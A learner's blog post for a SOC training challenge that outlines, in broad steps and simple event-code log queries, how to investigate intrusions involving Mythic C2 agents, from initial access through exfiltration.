SOC Challenge/Day 28-Investigate Mythic Agent Activity

tarih:

D28 - Investigate Mythic Agent Activity

1. Introduction

1.1 What is this guide about?

This guide provides a methodology for investigating malicious activity associated with Mythic Agents. Mythic is a powerful Command and Control (C2) framework often used for post-exploitation operations. The goal is to help analysts trace the steps an attacker takes after gaining access to a system, map out the attack chain, and identify key indicators of compromise (IOCs).

1.2 What does this guide try to solve or mitigate?

  • Understand Attacker Techniques: By following the attack flow (Initial Access, Discovery, Defense Evasion, etc.), analysts can reconstruct the sequence of events.
  • Improve Detection and Response: Identifying malicious processes, connections, and system changes helps mitigate further damage.
  • Guide Incident Investigation: This framework encourages thorough documentation and log analysis, ensuring all relevant data is captured for reporting.

1.3 What caused the need for this guide?

  • Sophisticated Threats: The use of C2 frameworks like Mythic by attackers requires specialized investigation methodologies.
  • Lateral Movement and Data Exfiltration Risks: Without prompt detection, attackers can move laterally through networks and steal data.
  • Need for Practical Training: Building investigation skills requires structured approaches like this guide, which can also be enhanced through platforms such as TryHackMe and HackTheBox.

2. Investigation Framework Based on the Attack Diagram

The following methodology was inspired by reviewing the attack diagram. It provides a structured approach to guide log investigation for each phase of the attack lifecycle.

2.1 Initial Access

  • Objective: Identify logs showing the attacker’s initial access to the system.
  • Query:
    • event.code: 4624 AND user.name
  • Action:
    • Check for successful logins in the dashboard.

2.2 Discovery

  • Objective: Identify commands executed to gather information about the system or network.
  • Action:
    • Look for PowerShell or CMD commands used for system and network reconnaissance.
    • Identify the server and time window where the attacker was active. Focus log review on this period.

2.3 Defense Evasion

  • Objective: Identify attempts to disable security tools.
  • Queries:
    • Changes to Windows Defender settings or disabling threat protection:
      • event.code: 5001 OR 5006 OR 5007

2.4 Execution

  • Objective: Identify actions taken to download and run agents on the compromised server.
  • Queries:
    • Network connection to C2 server:
      • event.code: 3 AND initiated: true
    • Command execution using PowerShell, CMD, or browser:
      • event.code: 29 for logs related to executable files.
  • Process Tracking:
    • If the process GUID is available, trace the parent and child processes to visualize the process flow.

2.5 C2 Connection

  • Objective: Identify and analyze connections to the Mythic C2 server.
  • Queries:
    • Network connection logs to the C2 server via specific ports:
      • event.code: 3 AND process GUID
  • Action:
    • Confirm regular communication between the compromised machine and the Mythic C2 server.

2.6 Exfiltration

  • Objective: Identify data exfiltration attempts.
  • Requirements:
    • Use of WireGuard or firewall logs for monitoring exfiltration.
  • Note:
    • This section emphasizes the importance of thorough analysis and investigation.
    • The goal is to follow leads (such as suspicious IPs or processes) to piece together the full picture of the attack.

# Example Investigation: Suspicious IP Activity

  • Scenario:
    • A suspicious IP is observed making connections on an unusual port.
  • Action:
    • Investigate the IP by searching for logs associated with:
      • ParentImage, ParentProcessGuid, ParentCommandLine, and ChildProcess.
    • Use these queries to visualize the event flow and determine:
      • Which program was launched and what subsequent processes were executed.

# Building the Puzzle One Piece at a Time

  • Approach:

    • Investigating suspicious activity is like assembling a puzzle. Each piece of information leads to the next clue, building towards a complete picture of the attack.

  • Current Progress:

    • I am still at the beginning stages of understanding this investigation process. However, I am gaining clarity on the logic behind it.

  • Next Steps:

    • As I continue learning with hands-on platforms like TryHackMe and HackTheBox, my skills will improve, and I will become more proficient in applying these investigation methods.

3. Conclusion

  • We explored the different phases of a Mythic Agent attack, focusing on initial access, discovery, execution, C2 communication, and exfiltration.
  • A structured methodology helps us investigate, document, and understand the attack flow.

  • Outlook:

    • With further practice and experience, especially through online training platforms, I aim to become familiar with threat hunting methodology and adapt it to my needs, ultimately building confidence in conducting these investigations effectively

Yorumlar

Yorum Gönder